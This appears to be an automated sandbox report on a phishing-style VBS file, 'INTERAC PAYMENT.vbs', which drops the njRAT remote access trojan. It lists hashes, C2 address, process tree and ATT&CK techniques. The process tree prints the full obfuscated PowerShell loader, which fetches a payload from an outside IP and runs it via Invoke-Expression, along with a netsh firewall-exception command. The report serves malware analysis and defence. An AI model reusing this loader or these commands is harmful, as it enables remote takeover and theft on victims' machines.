Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    20-09-2021 18:25

General

  • Target

    INTERAC PAYMENT.vbs

  • Size

    7KB

  • MD5

    f3bc5f7625cfb7d4f44f784561b05faf

  • SHA1

    8831e8de10c1365cbc23bf50b96b6292fd09af29

  • SHA256

    9b08fe9109b0e4b68f52624894d0ea9261f4a434f07d022f2d2b2d7c12877460

  • SHA512

    cd5a57d361c02aeda535d19461798d9b5779f94e17aa12cc2ee9db4ba1605a8ce8fe04dcf4a1bee312261902a7c2bb579cc916f98576d679ded10a6c64807665

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://13.112.210.240/NJNJNJNJbypass.txt

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

C2

103.156.92.140:5489

Mutex

b9bcbd71b3095eaa1d613e7db66ba013

Attributes
  • reg_key

    b9bcbd71b3095eaa1d613e7db66ba013

  • splitter

    |'|'|

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INTERAC PAYMENT.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13HHHHHHHHHHHHH112HHHHHHHHHHHHH210HHHHHHHHHHHHH240/NJNJNJNJbypassHHHHHHHHHHHHHtxt'.Replace('HHHHHHHHHHHHH','.');$SOS='%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH*eHHHHHHHHHHH!5HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH!5HHHHHHHHHHH*%HHHHHHHHHHH!3HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH5!HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7!HHHHHHHHHHH%eHHHHHHHHHHH57HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*cHHHHHHHHHHH!9HHHHHHHHHHH!5HHHHHHHHHHH!eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH!!HHHHHHHHHHH!fHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH*1HHHHHHHHHHH!!HHHHHHHHHHH53HHHHHHHHHHH5!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH57HHHHHHHHHHH*eHHHHHHHHHHH!cHHHHHHHHHHH*fHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7%HHHHHHHHHHH!9HHHHHHHHHHH*eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%8HHHHHHHHHHH*eHHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH*0HHHHHHHHHHH*3HHHHHHHHHHH*0HHHHHHHHHHH5!HHHHHHHHHHH%0HHHHHHHHHHH%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH%9HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*5HHHHHHHHHHH*0HHHHHHHHHHH57HHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH!fHHHHHHHHHHH*%HHHHHHHHHHH*aHHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH5aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH%dHHHHHHHHHHH!aHHHHHHHHHHH*fHHHHHHHHHHH*9HHHHHHHHHHH*eHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH7cHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split 'HHHHHHHHHHH' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        3⤵
          PID:1144
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
            PID:2052
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2356
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
              4⤵
                PID:3740

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Modify Existing Service

        1
        T1031

        Discovery

        System Information Discovery

        1
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/2356-168-0x0000000005220000-0x0000000005221000-memory.dmp
          Filesize

          4KB

        • memory/2356-173-0x0000000005050000-0x0000000005051000-memory.dmp
          Filesize

          4KB

        • memory/2356-162-0x000000000040747E-mapping.dmp
        • memory/2356-161-0x0000000000400000-0x000000000040C000-memory.dmp
          Filesize

          48KB

        • memory/2356-172-0x0000000004E40000-0x0000000004E41000-memory.dmp
          Filesize

          4KB

        • memory/2356-171-0x0000000004BC0000-0x0000000004C5C000-memory.dmp
          Filesize

          624KB

        • memory/2356-170-0x0000000004E80000-0x0000000004E81000-memory.dmp
          Filesize

          4KB

        • memory/2356-167-0x0000000004C80000-0x0000000004C81000-memory.dmp
          Filesize

          4KB

        • memory/2420-122-0x0000024525F30000-0x0000024525F32000-memory.dmp
          Filesize

          8KB

        • memory/2420-120-0x0000024525FB0000-0x0000024525FB1000-memory.dmp
          Filesize

          4KB

        • memory/2420-123-0x0000024525F33000-0x0000024525F35000-memory.dmp
          Filesize

          8KB

        • memory/2420-152-0x0000024526300000-0x0000024526323000-memory.dmp
          Filesize

          140KB

        • memory/2420-115-0x0000000000000000-mapping.dmp
        • memory/2420-141-0x0000024525F38000-0x0000024525F39000-memory.dmp
          Filesize

          4KB

        • memory/2420-130-0x0000024525F36000-0x0000024525F38000-memory.dmp
          Filesize

          8KB

        • memory/2420-125-0x0000024526360000-0x0000024526361000-memory.dmp
          Filesize

          4KB

        • memory/2420-163-0x0000024526330000-0x0000024526331000-memory.dmp
          Filesize

          4KB

        • memory/3740-169-0x0000000000000000-mapping.dmp